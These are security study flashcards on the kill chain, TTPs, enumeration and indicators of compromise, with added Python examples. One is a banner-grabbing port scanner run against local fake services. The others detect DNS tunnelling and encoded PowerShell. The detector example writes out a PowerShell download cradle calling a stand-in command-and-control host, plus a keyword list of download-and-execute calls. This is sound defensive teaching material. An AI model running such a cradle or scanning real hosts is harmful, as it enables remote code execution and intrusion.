Information Gathering and Vulnerability Scanning Flashcards
Cyber Kill Chain
- Reconnaissance
- Weaponisation
- Delivery
- Exploitation
- Installation
- Command and Control
- Action on Objective
Reconnaissance
- Social Media
- Website
- Whois
- DNS
- Footprint
- Open ports
Weaponisation
The attacker goes through the information gathered, identifies techniques that can be used to gain access, and pairs an exploit with a payload that can be delivered to the target.
Delivery
The weaponised payload is transmitted to the target, for example by phishing email, a malicious website or removable media.
Exploitation
The delivered exploit is triggered on the victim system, taking advantage of a vulnerability in an application, the operating system or the user.
Installation
Install a malicious payload or backdoor on the victim host to keep access after the initial exploit.
Command and Control
Two-way communication channel between the compromised host and the attacker's infrastructure. Over it the attacker escalates privileges, hides evidence of the compromise (for example by encrypting the traffic) and remotely controls the system.
Action on Objective
The attacker carries out the goal of the intrusion, such as data exfiltration, data destruction or lateral movement to further targets.
Diamond Model
Provides a structure for identifying correlated groups of events, and efficient methods to stop attacks while increasing analytic productivity. Its four core features are:
- Adversary
- Infrastructure
- Capability
- Victim
TTPs
Tactics, Techniques and Procedures
Activities and patterns that attackers would utilise.
Tactics
The way that attackers operate during an attack.
Techniques
The technical methods attackers use to achieve a tactical objective during their exploitation.
Procedures
Sequence of actions performed by an attacker to gain or achieve certain goals throughout their attack lifecycle.
Internal Reconnaissance
Enumeration
What kind of assets does the targeted organisation have:
- OS
- Services
- Apps and versions
- Hosts
- Processes
- User accounts
- IP addresses
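The Reconnaissance card (open ports) and the Enumeration card (services and versions) describe the same active step: connect to each port, read what the service says, and map the banner to a product and version. The example below is added here and is not part of the original flashcards; it starts two loopback listeners that send constructed banners (hypothetical, not captured from real hosts) so the scan runs offline, and uses a small hypothetical signature table in place of a real scanner's probe database.

```python
import re
import socket
import threading

# Hypothetical signature table: maps a greeting banner to a service name and the
# product string that exposes the version. Real scanners carry thousands of these.
BANNER_SIGNATURES = [
    ("ssh", re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<product>[\w.]+)")),
    ("smtp", re.compile(r"^220 \S+ ESMTP (?P<product>\S+)")),
    ("http", re.compile(r"^HTTP/1\.[01] \d{3}.*?\r\nServer: (?P<product>[^\r\n]+)", re.S)),
]


def fingerprint(banner):
    """Classify a banner; an empty banner means the port is open but silent."""
    for service, pattern in BANNER_SIGNATURES:
        m = pattern.search(banner)
        if m:
            return {"service": service, "product": m.group("product"), "banner": banner.strip()}
    return {"service": "unknown", "product": None, "banner": banner.strip()}


def grab_banner(host, port, timeout=1.0):
    """TCP connect scan of one port. Returns (is_open, banner). Closed ports refuse
    the connection; open ports that wait for the client to speak first (HTTP, for
    example) time out on recv and yield an empty banner."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                return True, sock.recv(1024).decode("latin-1")
            except socket.timeout:
                return True, ""
    except OSError:  # refused, filtered (connect timeout) or unreachable
        return False, ""


def scan(host, ports):
    """Enumerate open ports and fingerprint the services behind them."""
    results = {}
    for port in ports:
        is_open, banner = grab_banner(host, port)
        if is_open:
            results[port] = fingerprint(banner)
    return results


def start_fake_service(banner):
    """Loopback listener that greets every client with `banner`, standing in for a
    real daemon so the example runs offline. Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(banner.encode())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_port():
    """Reserve an ephemeral port and release it, so nothing is listening there."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def demo():
    # Constructed targets: two fake services plus one closed port to show that
    # closed ports are dropped from the results.
    targets = {
        "ssh": start_fake_service("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n"),
        "smtp": start_fake_service("220 mail.example.test ESMTP Postfix (Ubuntu)\r\n"),
        "closed": closed_port(),
    }
    results = scan("127.0.0.1", sorted(targets.values()))
    return targets, results


if __name__ == "__main__":
    targets, results = demo()
    for port, info in sorted(results.items()):
        print(f"{port}/tcp open  {info['service']:8} {info['product']}  [{info['banner']}]")
```

Banner grabbing only sees what the service volunteers; version strings can be edited or removed by the administrator, so treat a banner as a hint to confirm with a protocol-specific probe rather than as ground truth.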
Adversary Behavioural Identification
- Internal Reconnaissance
- PowerShell
- CLI processes
- Suspicious proxy events
- HTTP user agent
- C&C servers
DNS tunneling
Encoding malicious traffic (command and control, exfiltrated data) inside DNS queries and responses, because DNS is almost always allowed out of the network and rarely inspected.
Web-shells
Scripts uploaded to a compromised web server that let the attacker run commands on it through ordinary HTTP requests.
Data Staging
Collecting the data of interest into a central location on the network, often compressed or encrypted, before exfiltrating it.
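Two of the behaviours listed above (PowerShell abuse and DNS tunnelling) can be spotted from logs with simple statistics, which is what the cards leave unsaid. The example below is added here and is not part of the original flashcards. It runs over a constructed DNS query log and a constructed process-creation log (not real captures); the thresholds, the base-domain heuristic and the keyword list are assumptions chosen for the demonstration, not values from the page.

```python
import base64
import math
import re
from collections import defaultdict

# Constructed DNS query log (client, query name, query type), not a real capture.
# The long, random-looking first labels under exfil.example.net are the pattern
# that DNS tunnelling tools produce when each query carries a chunk of data.
DNS_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com MX
10.0.0.7 a8f3kz2q9x1m7vb4n0ptlwe6r5c.exfil.example.net TXT
10.0.0.7 z9q1v4mx8kb2t7lw3ne5rc0p6fa.exfil.example.net TXT
10.0.0.7 q2xm7lb9v1kz4t8pw0ne3rc5fa6.exfil.example.net TXT
10.0.0.7 b7kz1qx4m9v2t3lw8ne0rc6pa5f.exfil.example.net TXT
10.0.0.9 cdn.example.com A
"""


def shannon_entropy(text):
    """Bits per character: hostnames sit well below 3.5, encoded data above 4."""
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    # Assumption: the registrable domain is the last two labels (no public-suffix list).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_tunnelling(log, min_label_len=20, min_entropy=3.5, min_unique=3):
    """Flag base domains that receive many distinct, long, high-entropy labels.
    Ordinary hostnames are short and repeat; encoded payload chunks are long,
    look random and never repeat, since every chunk is a new name."""
    stats = defaultdict(lambda: {"names": set(), "clients": set(), "qtypes": set()})
    for line in log.strip().splitlines():
        client, qname, qtype = line.split()
        first_label = qname.split(".")[0]
        if len(first_label) >= min_label_len and shannon_entropy(first_label) >= min_entropy:
            s = stats[base_domain(qname)]
            s["names"].add(qname)
            s["clients"].add(client)
            s["qtypes"].add(qtype)
    return {
        dom: {"count": len(s["names"]), "clients": sorted(s["clients"]), "qtypes": sorted(s["qtypes"])}
        for dom, s in stats.items()
        if len(s["names"]) >= min_unique
    }


# Constructed process-creation log. The second entry is built here by encoding a
# download cradle the way `powershell -EncodedCommand` expects it (UTF-16LE, base64),
# so the raw command line contains none of the keywords a plain grep would look for.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.test/a')"
PROCESS_LOG = [
    'powershell.exe -NoProfile -Command "Get-Service"',
    "powershell.exe -nop -w hidden -enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode(),
]

ENCODED_ARG = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS = re.compile(r"IEX\b|Invoke-Expression|DownloadString|FromBase64String|Net\.WebClient", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_powershell(cmdlines):
    """Decode encoded commands before keyword matching; matching only the raw
    command line misses exactly the invocations attackers encode."""
    hits = []
    for cmdline in cmdlines:
        decoded = decode_encoded_command(cmdline)
        m = SUSPICIOUS.search(decoded if decoded is not None else cmdline)
        if m:
            hits.append({"cmdline": cmdline, "decoded": decoded, "matched": m.group(0)})
    return hits


if __name__ == "__main__":
    for dom, info in detect_dns_tunnelling(DNS_LOG).items():
        print(f"possible DNS tunnel to {dom}: {info}")
    for hit in flag_powershell(PROCESS_LOG):
        print(f"suspicious PowerShell ({hit['matched']}): {hit['decoded'] or hit['cmdline']}")
```

Both detectors trade on the same idea from the Adversary Behavioural Identification card: the attacker's activity has a shape (high-entropy labels, encoded arguments) that legitimate activity rarely has. Tune the thresholds on your own traffic before alerting on them, since CDNs and some anti-virus products also generate long DNS labels.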
Indicator of Compromise
- Unauthorised software and files
- Suspicious emails
- Suspicious registry entries and file system changes
- Unknown ports and protocol usage
- Excessive bandwidth usage
- Rogue hardware
- Service disruption and defacement
- Suspicious or unauthorised account usage